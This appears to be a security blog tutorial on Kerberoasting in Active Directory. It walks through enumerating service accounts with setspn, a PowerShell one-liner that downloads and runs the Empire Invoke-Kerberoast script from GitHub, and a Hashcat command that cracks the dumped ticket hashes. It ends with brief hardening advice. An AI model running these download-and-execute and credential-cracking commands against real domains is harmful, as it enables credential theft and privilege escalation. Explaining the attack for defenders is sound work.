The recent news about the SolarWinds hack that involves dozens of government agencies has brought new attention to attack against service accounts through Kerberos manipulation, known as Kerberoasting.
Although this is not the only serious attack method against Kerberos. ASREPRoasting is another attack on Kerberos that can provide an attacker with the password hashes for Active Directory accounts.
Table of Contents
How To Enumerate Service Accounts
The same command used to set the Service Principal Name of an Active Directory account can be used by attackers to identify the accounts with this attribute set. In other words, using the native setspn command can enumerate the domain for existing service accounts.
This attack behavior is typical for advanced attackers, that is to use builtin tools in Windows environments to evade detection, versus importing attack tools which can be noisy.
Reads, modifies, and deletes the Service Principal Names (SPN) directory property for an Active Directory service account. You use SPNs to locate a target principal name for running a service. You can use setspn to view the current SPNs, reset the account’s default SPNs, and add or delete supplemental SPNs
microsoft.com
Using a low level user, who is not a member of the local Administrators group, I can enumerate the domain since I am an authenticated user and therefore have the permissions to.
C:\Users\bobjones>setspn -T testlab.local -Q */*
How Kerberos Works
To truly understand how Kerberoasting works you must start with an understanding of how Kerberos authentication works. Since Windows 2000 and up Windows machines have been using Kerberos to provide authentication of services across the network.
A user authenticates to a computer on the domain then requests a Ticket Granting Ticket from the KDC which is usually the Active Directory Domain Controller. The process looks something like this:
- Kerberos authentication uses SPN, Service Principal Name to locate service accounts, to provide the requesting user with the service they are requesting.
- A user with a valid TGT Kerberos ticket can request a TGS ticket from the KDC which is usually the Active Directory Domain Controller.
- These TGS tickets are encrypted using the NTLM hash of the service account’s password which means it can be reformatted and cracked by tools like Hashcat and John.
What Is Kerberoasting And How Does Kerberoasting Work?
Most services on a Windows machine are built in and run by system accounts. Where Kerberoasting is effective is being able to easily crack the password set by a lazy admin.
Service accounts are given a service principal name and when users request the service associated with them the Kerberos response is exploited to dump the password hash of the service account. The response from Kerberos is a ticket granting service ticket that is encrypted using the NTLM hash of the service account. This ticket is usually taken offline and brute forcing tools are used to crack the password hash for that account.
Now what does that mean for the attack cycle if f the service account whose password I just cracked is a member of the domain admins group then I can do anything that a domain admin can do on the network.
C:\Users\bobjones>powershell.exe -NoP -NonI -Exec Bypass IEX(New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1’);Invoke-Kerberoast -erroraction silentycontinue -OutputFormat Hashcat
To demonstrate how easy it is to perform Kerberoasting once I use the PowerShell Empire Github repository to automatically find the available SPNs, request TGS tickets for services on the network, and output the hash to crack it.
How To Crack Encrypted Kerberos TGS Hashes
Once I have the encrypted Kerberos TGS ticket, the part of one which is encrypted using the NTLM password of the service account being requested by the user, I can use Hashcat to crack the hash.
hashcat -m 13100 hashes.txt -a 6 rockyou.txt ?d?d?d?d
For this example I am going to use Hashcat with a special parameter combination, this will look for 4 digits after the ASCII portion of the password.
I have cracked the service account’s password and can use it to escalate privileges further on the network.
How To Defend Against Kerberoasting
Since Kerberos authentication is built in to the Windows environment as a way of brokering authentication in an Active Directory domain, the sad truth is there is not much in the way of corrective actions. There are however several preventative measures you can take to secure the domain against Kerberoasting.
- Make sure service accounts’ passwords are complex and long.
- Rotate the passwords for service accounts routinely.
Recommended Reading
I highly recommend buying Georgia Wiedman’s Penetration Testing. Check the price on Amazon.
Note* As as an Amazon associate I may earn from qualifying purchases.